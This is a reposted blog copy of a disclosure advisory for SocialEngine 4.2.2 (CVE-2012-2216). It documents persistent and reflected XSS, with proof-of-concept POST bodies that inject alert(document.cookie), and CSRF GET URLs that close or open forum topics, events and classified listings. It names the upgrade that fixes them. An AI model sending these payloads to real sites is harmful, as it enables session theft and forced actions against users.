Thursday 31 May 2012

SocialEngine 4.2.2 Multiple Vulnerabilities

Regard Viscount , Now i Will Share Bugs
 
Social Engine 4.2.2 Multiples Vulnerabilities
Earlier versions are also possibly vulnerable.
 
INFORMATION
 
Product: Social Engine 4.2.2
Remote-Exploit: yes
Vendor-URL: http://www.socialengine.net/
Discovered by: Tiago Natel de Moura aka "i4k"
Discovered at: 10/04/2012
CVE Notified: 10/04/2012
CVE Number: CVE-2012-2216
 
OVERVIEW
 
Social Engine versions 4.2.2 is vulnerable to XSS and CSRF.
 
INTRODUCTION
 
SocialEngine is a PHP-based white-label social networking service
platform, that provides features similar to a social network on a user's
website. Main features include administration of small-to-mid scale
social networks, some customization abilities, unencrypted code,
multilingual capability, and modular plugin/widget compatibility. There
is a range of templates and add-ons available to extend the basic
features already included in the SocialEngine core.
 
VULNERABILITY DESCRIPTION
 
== Persistent XSS in music upload. ==
 
CWE-79: http://cwe.mitre.org/data/definitions/79.html
The software does not neutralize or incorrectly neutralizes
user-controllable input before it is placed in output that is
used as a web page that is served to other users.
 
Proof Of Concept:
POST http://localhost/index.php/music/create
 
POST data without form-data enctype:
title=<script>alert(document.cookie);</script>&description=teste
&search=1&auth_view=everyone&MAX_FILE_SIZE=8388608&filename=
&fancyuploadfileids=15
 
== Persistent XSS in creating events ==
 
POST
http://localhost/socialengine/socialengine422_trial/index.php/events/create
 
POST data without form-data enctype:
title=teste XSS 3&description=teste XSS 3&starttime[date]=4/9/2012&
starttime[hour]=1&starttime[minute]=0&starttime[ampm]=AM&endtime[date]=4/12/2012
&endtime[hour]=1&endtime[minute]=0&endtime[ampm]=AM&host=teste
&location=<script>alert(document.cookie);</script>&MAX_FILE_SIZE=8388608&
photo=&category_id=0&search=&search=1&approval=&auth_invite=&auth_invite=1&
auth_view=everyone&auth_comment=everyone&auth_photo=everyone&submit=
 
== Reflected XSS in search form of events area. ==
 
Direct javascript injected:
POST http://localhost/index.php/widget/index/content_id/644
 
format=html&subject=event_1&search=';alert(document.cookie);var a = '
 
Proof of Concept:
- - Go to URL: /index.php/event/$EVENT_ID
- - Click on the "Guests"
- - Click in "Search guests" form
- - Submit: ';alert(document.cookie); var a = '
 
You will see your PHPSESSID in the alert.
 
== Multiples CSRF vulnerabilities ==
 
CWE-352: http://cwe.mitre.org/data/definitions/352.html
The web application does not, or can not, sufficiently verify whether
a well-formed, valid, consistent request was intentionally provided by
the user who submitted the request.
 
A CSRF in the plugin "Forum" allows forcing the owner of the event to do
some
activities such as:
 
Close a topic:
GET /index.php/forums/topic/4/example-topic/close/close/1
 
Open a topic:
GET /index.php/forums/topic/4/example-topic/close/close/0
 
A CSRF in the plugin "Event" allows forcing the owner of the event to do
some
activities such as:
 
Close the event:
GET /index.php/events/topic/close/close/1/event_id/2/topic_id/2
 
Open the event:
GET /index.php/events/topic/close/close/0/event_id/2/topic_id/2
 
"Watch Topic":
GET /index.php/events/topic/watch/watch/1/event_id/2/topic_id/2
 
"Stop Watching Topic":
GET /index.php/events/topic/watch/watch/0/event_id/2/topic_id/2
 
A CSRF in the plugin "Classifieds" allows forcing the owner of the event
to do
some activities such as:
 
Open the classified listing:
GET /index.php/classifieds/close/1/closed/0
 
Close the classified listing:
GET /index.php/classifieds/close/1/closed/1
 
VERSIONS AFFECTED
 
Tested with version 4.2.2 but earlier versions are possibly vulnerable.
 
SOLUTION
 
Upgrade to Social Engine 4.2.4.
 
kalo dapat jangan lupa semangat ya salam kadal :)
 
regards Viscount 

Socializer Widget By Blogger Yard
SOCIALIZE IT →
FOLLOW US →
SHARE IT →

0 comments:

Post a Comment